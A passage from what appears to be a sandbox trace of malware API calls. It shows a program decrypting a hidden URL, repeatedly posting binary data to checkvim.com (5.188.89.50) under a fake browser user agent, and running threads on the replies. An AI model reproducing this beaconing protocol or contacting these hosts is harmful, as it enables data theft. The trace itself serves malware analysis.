GetProcessHeap () returned 0x840000 [0305.324] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bb8 [0305.324] socket (af=2, type=1, protocol=6) returned 0x500 [0305.324] connect (s=0x500, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0305.390] FreeAddrInfoW (pAddrInfo=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0305.390] GetProcessHeap () returned 0x840000 [0305.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0305.390] GetProcessHeap () returned 0x840000 [0305.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0305.391] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0305.392] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0305.392] GetProcessHeap () returned 0x840000 [0305.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0305.392] GetProcessHeap () returned 0x840000 [0305.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0305.392] GetProcessHeap () returned 0x840000 [0305.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f908 [0305.392] GetProcessHeap () returned 0x840000 [0305.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0305.393] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0305.394] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0305.394] GetProcessHeap () returned 0x840000 [0305.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0305.394] GetProcessHeap () returned 0x840000 [0305.394] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0305.394] send (s=0x500, buf=0x873a58*, len=237, flags=0) returned 237 [0305.395] send (s=0x500, buf=0x87eb58*, len=159, flags=0) returned 159 [0305.395] GetProcessHeap () returned 0x840000 [0305.395] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0305.395] recv (in: s=0x500, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0305.732] GetProcessHeap () returned 0x840000 [0305.732] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0305.732] GetProcessHeap () returned 0x840000 [0305.732] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0305.732] GetProcessHeap () returned 0x840000 [0305.732] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0305.732] GetProcessHeap () returned 0x840000 [0305.732] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0305.732] closesocket (s=0x500) returned 0 [0305.733] GetProcessHeap () returned 0x840000 [0305.733] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bb8 | out: hHeap=0x840000) returned 1 [0305.733] GetProcessHeap () returned 0x840000 [0305.733] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0305.733] GetProcessHeap () returned 0x840000 [0305.733] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0305.733] GetProcessHeap () returned 0x840000 [0305.733] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0305.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xcb8) returned 0x500 [0305.735] Sleep (dwMilliseconds=0xea60) [0305.743] GetProcessHeap () returned 0x840000 [0305.743] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0305.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.744] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0305.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.750] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0305.755] GetProcessHeap () returned 0x840000 [0305.755] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0305.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.755] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0305.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.756] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0305.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.757] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.757] GetProcessHeap () returned 0x840000 [0305.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0305.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.758] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0305.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.758] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0305.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.759] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0305.759] GetProcessHeap () returned 0x840000 [0305.759] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0305.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.760] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.761] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.761] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.762] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.762] GetProcessHeap () returned 0x840000 [0305.762] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0305.762] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0305.762] GetProcessHeap () returned 0x840000 [0305.762] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0305.762] GetProcessHeap () returned 0x840000 [0305.762] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0305.762] GetProcessHeap () returned 0x840000 [0305.762] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0305.762] GetProcessHeap () returned 0x840000 [0305.762] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0305.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.763] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0305.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.769] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0305.775] GetProcessHeap () returned 0x840000 [0305.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0305.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.776] CryptImportKey (in: hProv=0x86f2d0, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0305.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.777] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0305.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.778] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.778] GetProcessHeap () returned 0x840000 [0305.778] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0305.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.778] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0305.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.779] CryptDestroyKey (hKey=0x87e670) returned 1 [0305.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0305.780] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0305.780] GetProcessHeap () returned 0x840000 [0305.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0305.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.781] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0305.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.782] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0305.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.782] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0305.782] GetProcessHeap () returned 0x840000 [0305.782] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0305.783] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0305.784] GetProcessHeap () returned 0x840000 [0305.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0305.784] socket (af=2, type=1, protocol=6) returned 0x504 [0305.784] connect (s=0x504, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0305.853] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0305.853] GetProcessHeap () returned 0x840000 [0305.853] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0305.853] GetProcessHeap () returned 0x840000 [0305.853] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0305.854] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0305.855] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0305.855] GetProcessHeap () returned 0x840000 [0305.855] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0305.855] GetProcessHeap () returned 0x840000 [0305.855] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0305.855] GetProcessHeap () returned 0x840000 [0305.855] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0305.855] GetProcessHeap () returned 0x840000 [0305.855] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0305.855] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0305.856] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0305.856] GetProcessHeap () returned 0x840000 [0305.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0305.856] GetProcessHeap () returned 0x840000 [0305.856] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0305.856] send (s=0x504, buf=0x873a58*, len=237, flags=0) returned 237 [0305.856] send (s=0x504, buf=0x87eb58*, len=159, flags=0) returned 159 [0305.856] GetProcessHeap () returned 0x840000 [0305.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0305.856] recv (in: s=0x504, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0306.218] GetProcessHeap () returned 0x840000 [0306.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0306.218] GetProcessHeap () returned 0x840000 [0306.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0306.218] GetProcessHeap () returned 0x840000 [0306.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0306.218] GetProcessHeap () returned 0x840000 [0306.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0306.218] closesocket (s=0x504) returned 0 [0306.220] GetProcessHeap () returned 0x840000 [0306.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0306.220] GetProcessHeap () returned 0x840000 [0306.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0306.220] GetProcessHeap () returned 0x840000 [0306.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0306.220] GetProcessHeap () returned 0x840000 [0306.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0306.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1274) returned 0x504 [0306.222] Sleep (dwMilliseconds=0xea60) [0306.228] GetProcessHeap () returned 0x840000 [0306.228] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0306.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.229] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0306.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.235] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0306.240] GetProcessHeap () returned 0x840000 [0306.240] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0306.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.241] CryptImportKey (in: hProv=0x86fdf8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0306.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.242] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0306.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.243] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.243] GetProcessHeap () returned 0x840000 [0306.243] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0306.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.244] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0306.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.245] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0306.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.246] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0306.246] GetProcessHeap () returned 0x840000 [0306.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0306.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.247] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.248] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.249] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.250] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.250] GetProcessHeap () returned 0x840000 [0306.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0306.250] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0306.250] GetProcessHeap () returned 0x840000 [0306.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0306.250] GetProcessHeap () returned 0x840000 [0306.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0306.250] GetProcessHeap () returned 0x840000 [0306.250] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0306.250] GetProcessHeap () returned 0x840000 [0306.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0306.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.251] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0306.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.255] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0306.260] GetProcessHeap () returned 0x840000 [0306.260] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0306.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.261] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0306.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.262] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0306.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.263] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.263] GetProcessHeap () returned 0x840000 [0306.263] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0306.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.264] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0306.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.265] CryptDestroyKey (hKey=0x87e330) returned 1 [0306.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0306.266] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0306.266] GetProcessHeap () returned 0x840000 [0306.266] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0306.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.267] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0306.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.267] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0306.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.268] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0306.268] GetProcessHeap () returned 0x840000 [0306.268] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0306.268] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0306.270] GetProcessHeap () returned 0x840000 [0306.270] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0306.270] socket (af=2, type=1, protocol=6) returned 0x508 [0306.270] connect (s=0x508, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0306.338] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0306.339] GetProcessHeap () returned 0x840000 [0306.339] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0306.339] GetProcessHeap () returned 0x840000 [0306.339] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0306.339] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0306.340] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0306.340] GetProcessHeap () returned 0x840000 [0306.340] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0306.340] GetProcessHeap () returned 0x840000 [0306.340] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0306.340] GetProcessHeap () returned 0x840000 [0306.340] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0306.340] GetProcessHeap () returned 0x840000 